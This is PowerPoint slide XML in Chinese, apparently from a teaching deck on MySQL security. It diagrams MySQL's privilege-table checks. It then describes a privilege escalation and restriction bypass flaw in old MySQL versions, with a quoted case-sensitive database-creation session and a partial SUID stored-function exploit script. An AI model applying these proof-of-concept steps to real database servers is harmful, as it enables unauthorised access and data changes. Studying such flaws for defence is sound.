          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07910E5-49F8-466C-815A-6F434D8FC922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3832489" y="1200117"/>
            <a:ext cx="316835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用户向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>发出操作请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="箭头: 右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B71E9B9-A751-4349-8CBD-E680943A8CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2065527">
            <a:off x="6730439" y="1910658"/>
            <a:ext cx="913529" cy="197272"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224A962E-B5B7-4596-9E7E-39178BB88137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768985" y="2345514"/>
            <a:ext cx="4583600" cy="13715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err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>权限表中的权限信息，匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>字段值，查看请求的全局权限是否被允许，如果找到匹配结果，操作被允许执行，否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>继续向下查找</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="箭头: 右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD2CB9C-BAEA-4775-91CE-A8C9597A46B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8519836" y="4025727"/>
            <a:ext cx="913529" cy="197272"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4740942-BAA3-408E-A1A9-7ED77D0F1E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6804009" y="4581128"/>
            <a:ext cx="4583600" cy="13715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err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>权限表中的权限信息，匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>字段值，查看请求的数据库级别的权限是否被允许，如果找到匹配结果，操作被允许执行，否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>继续向下查找</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="箭头: 右 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FAD980B-542A-4094-8849-6119E6994FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5807969" y="5168250"/>
            <a:ext cx="913529" cy="197272"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03AB6657-A76B-4C17-B759-BFC622BB5580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141857" y="4581127"/>
            <a:ext cx="4583600" cy="13715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err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>tables_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>权限表中的权限信息，匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>字段值，查看请求的数据表级别的权限是否被允许，如果找到匹配结果，操作被允许执行，否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>继续向下查找</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="箭头: 右 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C77F2C9-A751-4227-9079-364B134D1228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2497511" y="4075161"/>
            <a:ext cx="913529" cy="197272"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6390301-0302-4CC9-ACC7-33E4CB3CE002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130896" y="2348880"/>
            <a:ext cx="4583600" cy="13715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err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>columns_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>权限表中的权限信息，匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>字段值，查看请求的列级别的权限是否被允许，如果找到匹配结果，操作被允许执行，否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>返回错误信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338006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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>上，拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的文件系统支持区分大小写的文件名。 此外，由于在错误的安全环境中计算了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例程的参数，攻击者可以通过存储的例程以例程定义者的权限执行任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>DML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句。成功攻击要求用户对所存储例程拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>EXECUTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>、创建数据库 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>以下为引用的内容： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>my.mysql.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> -u sample -p -A sample</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Welcome to the MySQL monitor. Commands end with ; or \g.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Your MySQL connection id is 263935 to server version: 4.1.16-standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>&gt; create database another;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>ERROR 1044: Access denied for user 'sample'@'%' to database 'another'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>&gt; create database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>sAmple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Query OK, 1 row affected (0.00 sec) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>权限提升及安全限制绕过漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089478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5256584" cy="3849292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>权限提升 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>以下为引用的内容： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>disable_warnings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop database if exists mysqltest1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop database if exists mysqltest2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>drop function if exists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>enable_warnings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Prepare playground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create database mysqltest1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create database mysqltest2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>grant all privileges on mysqltest1.* to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># Create harmless (but SUID!) function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>f_suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>) returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>grant execute on function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>test.f_suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>use mysqltest2;</a:t>
            </a:r>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a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>权限提升及安全限制绕过漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C769BDA1-210D-449B-BD99-8CB8FA161E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5951984" y="1628800"/>
            <a:ext cx="5256584" cy="384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zh-CN" sz="1200" dirty="0"/>
              <a:t># Create table in which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malory@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> will be interested but to which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t># he won't have any access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>create table t1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>connect (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>malcon</a:t>
            </a:r>
            <a:r>
